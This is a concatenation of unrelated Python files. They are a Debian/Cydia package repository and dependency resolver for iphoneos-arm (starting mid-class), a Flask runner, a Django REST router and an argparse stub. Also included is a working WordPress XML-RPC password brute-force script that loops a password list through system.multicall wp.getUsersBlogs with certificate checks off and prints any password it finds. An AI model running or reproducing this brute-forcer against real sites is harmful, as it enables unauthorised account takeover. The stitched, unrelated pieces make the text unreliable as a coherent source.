op[1] not in '<=>': op = op[0] self.vers = DebianVersion(s[len(op):]) if len(op) == 1: op = op + op if op not in self.OPS: raise ValueError('invalid op: %s' % op) self.op = op self.possibilities = self.OPS[self.op] def satisfied_by(self, vers): if not isinstance(vers, self.vers.__class__): vers = self.vers.__class__(vers) return vers._cmp(self.vers) in self.possibilities def __repr__(self): return '{} {}'.format(self.op, str(self.vers)) class PkgReq: def __init__(self, s): s = s.strip() self._subreqs = set(SubPkgReq(sub) for sub in s.split('|')) self.names = set(sr.name for sr in self._subreqs) def satisfied_by(self, pkg, exact=False): for req in self._subreqs: if req.satisfied_by(pkg, exact): return True return False def __repr__(self): return '<{}>'.format(' | '.join(map(repr, self._subreqs))) def __eq__(self, other): if not isinstance(other, self.__class__): return NotImplemented return self._subreqs == other._subreqs def __ne__(self, other): if not isinstance(other, self.__class__): return NotImplemented return self._subreqs != other._subreqs def __hash__(self): return reduce(lambda x, y: x ^ hash(y), self._subreqs, 0) class SubPkgReq: def __init__(self, s): name = s.strip() vers_match = re.match(r'(.*) \((.*)\)', s) if vers_match: self.name = vers_match.group(1).strip() self.version_req = VersionReq(vers_match.group(2)) else: self.name = name self.version_req = None def satisfied_by(self, pkg, exact=False): if self.name != pkg.name and (exact or self.name not in pkg.provides): return False if self.version_req: return self.version_req.satisfied_by(pkg.version) return True def __repr__(self): return '{}{}'.format(self.name, ' ({})'.format(self.version_req) if self.version_req else '') def __eq__(self, other): if not isinstance(other, self.__class__): return NotImplemented return self.name == other.name and self.version_req == other.version_req def __ne__(self, other): if not isinstance(other, self.__class__): return NotImplemented return self.name != other.name or self.version_req != other.version_req def __hash__(self): return hash(self.name) ^ hash(self.version_req) class Package: def __init__(self, asstring, repo=None): self._params = Utils.asstring_to_dict(asstring) self.repo = repo self.name = self._params['Package'] self.version = DebianVersion(self._params['Version']) self.filename = self._params.get('Filename') self.provides = set() for s in self._params.get('Provides', '').split(','): s = s.strip() if s: self.provides.add(s.strip()) def get_csv_param(key): for s in self._params.get(key, '').strip().split(','): s = s.strip() if s: yield s self.depends = set() for s in itertools.chain(get_csv_param('Depends'), get_csv_param('Pre-Depends')): try: self.depends.add(PkgReq(s)) except ValueError: print('Fail on %s: dep %s' % (self, s)) raise self.conflicts = set() for s in get_csv_param('Conflicts'): try: self.conflicts.add(PkgReq(s)) except ValueError: print('Fail on %s: conf %s' % (self, s)) raise self.integrity = { 'size': int(self._params.get('Size', 0)) or None, 'md5': self._params.get('MD5sum'), 'sha1': self._params.get('SHA1'), 'sha256': self._params.get('SHA256'), } def download(self, saveto=None): if self.repo is None or self.filename is None: raise Exception('Filename/Repo is None, cant download') fname = Utils.download_file(self.repo.relative_url(self.filename), local_filename=saveto) integ = self._check_integrity(fname) if not integ[0]: os.remove(fname) raise Exception('integrity error: %s' % integ[1]) return fname def _check_integrity(self, fname): try: for k, v in self.integrity.items(): if v is None: continue if k == 'size': act_size = os.path.getsize(fname) if act_size != v: raise Exception('integrity error: Expected size %d, got %d' % (v, act_size)) elif k in ('md5', 'sha1', 'sha256'): if k == 'md5': hasher = hashlib.md5() elif k == 'sha1': hasher = hashlib.sha1() elif k == 'sha256': hasher = hashlib.sha256() vupper = v.upper() act_v = HashTools.hash_file(fname, hasher, ashexstr=True).upper() if vupper != act_v: raise Exception('integrity error: Expected hash %s to be %s, got %s' % (k, vupper, act_v)) else: raise Exception('unknown integrity check type: %s' % k) except Exception as e: return False, ' '.join(e.args) return True, 'ok' def __repr__(self): return '<Package {} v{}{}>'.format( self.name, self.version, (' (from %s)' % str(self.repo)) if self.repo else '' ) def __eq__(self, other): if not isinstance(other, Package): return NotImplemented return (self.repo == other.repo) and (self.name == other.name) and (self.version == other.version) def __ne__(self, other): if not isinstance(other, Package): return NotImplemented return not (self == other) def __hash__(self): return hash(self.name) ^ hash(self.version) ^ hash(self.repo) def asstring(self): return '\n'.join('{}: {}'.format(k, v) for k, v in self._params.items()) class Repo: def __init__(self, url, dist=None, comp=None, arch='iphoneos-arm'): self.url = url if dist is None: release_path = 'Release' else: release_path = '/'.join(('dists', dist, 'Release')) release = self._fetch_relative(release_path, verify=False) if release.ok: self._release = Utils.asstring_to_dict(release.text) self.name = self._release['Origin'] self.label = self._release.get('Label', self.name) else: self._release = dict() urlparsed = urlparse(self.url) self.name = urlparsed.netloc + urlparsed.path self.label = self.name self._integrity_by_file = dict() if 'MD5Sum' in self._release: for l in self._release['MD5Sum'].split('\n'): l = l.strip() if not l: continue md5sum, size, name = map(str.strip, l.split()) self._integrity_by_file[name] = { 'size': int(size), 'md5': md5sum } self.packages = list() self.packages_by_name = dict() if dist is None or comp is None: packages_path = 'Packages' else: packages_path = '/'.join(('dists', dist, comp, 'binary-' + arch, 'Packages')) for pkgstr in self._fetch_bz2(packages_path).split('\n\n'): if not pkgstr: continue pkg = Package(pkgstr, self) self.packages.append(pkg) if pkg.name in self.packages_by_name: # print('warning: duplicate package %s' % pkg, end=' -- ') prevpkg = self.packages_by_name[pkg.name] if pkg.version > prevpkg.version: # print('overriding prev (%s) since prev is older' % prevpkg) self.packages_by_name[pkg.name] = pkg else: pass # print('not overriding prev (%s) since prev is newer' % prevpkg) else: self.packages_by_name[pkg.name] = pkg def _fetch(self, url): return requests.get(url, stream=True) def _fetch_relative(self, uri, verify=True): url = self.relative_url(uri) r = self._fetch(url) if r.ok and verify: integ = self._integrity_by_file.get(uri) if integ: if 'size' in integ: act_size = len(r.content) exp_size = integ['size'] if act_size != exp_size: raise Exception('integrity error for %s: expcected size %d, got %d' % (uri, exp_size, act_size)) if 'md5' in integ: exp_md5 = integ['md5'].upper() act_md5 = HashTools.hash_bytestr_iter(HashTools.file_as_blockiter(io.BytesIO(r.content)), hashlib.md5(), True).upper() if exp_md5 != act_md5: raise Exception('integrity error for %s: Expected md5 %s, got %s' % (uri, exp_md5, act_md5)) return r def _fetch_bz2(self, name): r = self._fetch_relative(name + '.bz2') if r.ok: return bz2.decompress(r.content).decode('utf-8', errors='ignore') r = self._fetch_relative(name) if r.ok: return r.content.decode('utf-8', errors='ignore') raise Exception('%s & %s.bz2 are missing' % (name, name)) def satisfy_req(self, req): if not isinstance(req, PkgReq): req = PkgReq(req) for name in req.names: fast = self.packages_by_name.get(name) if fast is not None and req.satisfied_by(fast): return fast for p in self.packages: if req.satisfied_by(p): return p return None def relative_url(self, rel): return '%s/%s' % (self.url, rel) def __repr__(self): return '<Repo {} with {} packages>'.format(self.name, len(self.packages)) def __str__(self): return '<{}>'.format(self.label) def __eq__(self, other): if not isinstance(other, Repo): return NotImplemented return self.url == other.url def __ne__(self, other): if not isinstance(other, Repo): return NotImplemented return self.url != other.url def __hash__(self): return hash(self.url) class LocalRepo(Repo): class FakeResponse: def __init__(self, ok, content=None): self.ok = ok if content is not None: self.content = content self.text = content.decode('utf-8', errors='ignore') def __init__(self, url, dist=None, comp=None, arch='iphoneos-arm'): super().__init__(url, dist, comp, arch) self.url = os.path.abspath(self.url) def __repr__(self): return '<LocalRepo {} with {} packages>'.format(self.name, len(self.packages)) def _fetch(self, url): try: with open(url, 'rb') as f: return self.FakeResponse(True, f.read()) except FileNotFoundError: return self.FakeResponse(False) class RepoSet: def __init__(self, repos): self.repos = set() self.packages_by_name = dict() self.add_repos(repos) def _update_pkgs_by_name(self, new_repos=None, removed_repos=None): if new_repos is not None: for repo in new_repos: for _, pkg in repo.packages_by_name.items(): if pkg.name in self.packages_by_name: # print('warning: duplicate package %s' % pkg, end=' -- ') prevpkg = self.packages_by_name[pkg.name] if pkg.version > prevpkg.version: # print('overriding prev (%s) since prev is older' % prevpkg) self.packages_by_name[pkg.name] = pkg else: pass # print('not overriding prev (%s) since prev is newer' % prevpkg) else: self.packages_by_name[pkg.name] = pkg if removed_repos is not None: removed_pkg_names = set() for _, pkg in self.packages_by_name.items(): if pkg.repo in removed_repos: removed_pkg_names.add(pkg.name) for n in removed_pkg_names: del self.packages_by_name[n] p = self.satisfy_req(n) if p is not None: self.packages_by_name[n] = p def add_repos(self, repos): added = set() for r in repos: if not isinstance(r, Repo): r = Repo(r) if r not in self.repos: added.add(r) self.repos.add(r) self._update_pkgs_by_name(new_repos=added) def remove_repos(self, repos): removed = set() for r in repos: if not isinstance(r, Repo): r = Repo(r) if r in self.repos: removed.add(r) self.repos.remove(r) self._update_pkgs_by_name(removed_repos=removed) def satisfy_req(self, req): if not isinstance(req, PkgReq): req = PkgReq(req) for name in req.names: fast = self.packages_by_name.get(name) if fast is not None and req.satisfied_by(fast): return fast bestp = None for r in self.repos: p = r.satisfy_req(req) if p is not None: if (bestp is None) or (bestp.version < p.version): bestp = p return bestp def satisfy_pkg_deps(self, needed_pkg, recursive=False): if not isinstance(needed_pkg, Package): return TypeError('needed_pkg must be %s' % Package) # XXX perform magic woodo on req and not on pkgs to avoid extra lookups alldeps = set() allreqs = set() pkgs = Queue() pkgs.put(needed_pkg) while not pkgs.empty(): pkg = pkgs.get() for req in pkg.depends: if req in allreqs: continue allreqs.add(req) p = self.satisfy_req(req) if p is None: raise Exception('Cant satisfy requirement: %s (for pkg %s)' % (req, pkg.name)) if p not in alldeps and p != needed_pkg: # print('[ADDED %s] -- because required by %s' % (p, pkg)) alldeps.add(p) if recursive: pkgs.put(p) conflict = self._pkgset_has_conflicts(alldeps) if conflict: raise Exception('conflict: {}'.format(conflict)) return alldeps def satisfy_reqs_n_deps(self, reqs): if isinstance(reqs, (str, PkgReq)): reqs = [reqs] requirements = (req if isinstance(req, PkgReq) else PkgReq(req) for req in reqs) reqdeps = set(self.satisfy_req(req) for req in requirements) deps = set() for r in reqdeps: deps.update(self.satisfy_pkg_deps(r, recursive=True)) reqdeps.update(deps) conflict = self._pkgset_has_conflicts(reqdeps) if conflict: raise Exception('conflict: {}'.format(conflict)) return reqdeps @staticmethod def _pkgset_has_conflicts(pkgset): confs = dict() for d in pkgset: for c in d.conflicts: if c in confs: confs[c] += [d] else: confs[c] = [d] for conf, pkgs in confs.items(): for d in pkgset: if conf.satisfied_by(d, exact=True): return conf, pkgs return None def __str__(self): return '<RepoSet with %d repos>' % len(self.repos) def __repr__(self): return '<RepoSet {%s}>' % ', '.join(map(str, self.repos))
# -*- coding: utf-8 -*- #from tst import testUnitarios from src import Controlador import unittest import os #runner = unittest.TextTestRunner() #result = runner.run(unittest.makeSuite(testUnitarios.TestUnitarios)) port = int(os.environ.get('PORT', 5000)) Controlador.app.run(threaded=True, host='0.0.0.0', port=port)
""" Acme URL's """ # Django from django.urls import include, path # Django REST Framework from rest_framework.routers import DefaultRouter # Views from root.Acme.api.views import CategoryViewSet, ProductViewSet, OrdersViewSet, OperationsViewSet router = DefaultRouter(trailing_slash=False) router.register(r"categories", CategoryViewSet, basename="categories") router.register(r"products", ProductViewSet, basename="products") router.register(r"orders", OrdersViewSet, basename="orders") router.register(r"operations", OperationsViewSet, basename="operations") app_name = "Acme" urlpatterns = [ # API path("", include(router.urls)), ]
#!/usr/bin/python ''' ''' from __future__ import print_function import urllib2 import sys import ssl if len(sys.argv) < 3: exit('Error: not enough arguments. Usage...') url = sys.argv[1] pwfile = sys.argv[2] user = sys.argv[3] # read in list of passwords with open(pwfile, 'r') as f: pwlist = f.read().splitlines() # construct XML for RPC POST request for pw in pwlist: data = "<?xml version=\"1.0\"?><methodCall><methodName>system.multicall</methodName><params><param><value><array><data><value><struct><member><name>methodName</name><value><string>wp.getUsersBlogs</string></value></member><member><name>params</name><value><array><data><value><array><data><value><string>%s</string></value><value><string>%s</string></value></data></array></value></data></array></value></member></struct></value></data></array></value></param></params></methodCall>" % (user, pw) # create SSL request if needed ctx = ssl.create_default_context() ctx.check_hostname = False ctx.verify_mode = ssl.CERT_NONE # post request try: req = urllib2.Request(url, data, headers={'Content-Type': 'application/xml'}) rsp = urllib2.urlopen(req,context=ctx) except urllib2.HTTPError as e: print(e.code) except urllib2.URLError as e: print(e.reason) else: content = rsp.read() # checks for either 'Incorrect' or 'isAdmin' keywords # note that the isAdmin does not ensure that the user # is a wordpress admin... the boolean flag might be 0 if 'Incorrect' in content: print('.', end='') sys.stdout.flush() elif 'isAdmin' in content: print("\nPassword found for user: \n\t - username: %s\n\t - password: %s" % (user,pw)) exit()
import argparse def main(args=None): parser = argparse.ArgumentParser() #add init parser for platform like package and simple package if __name__=='__main__': main()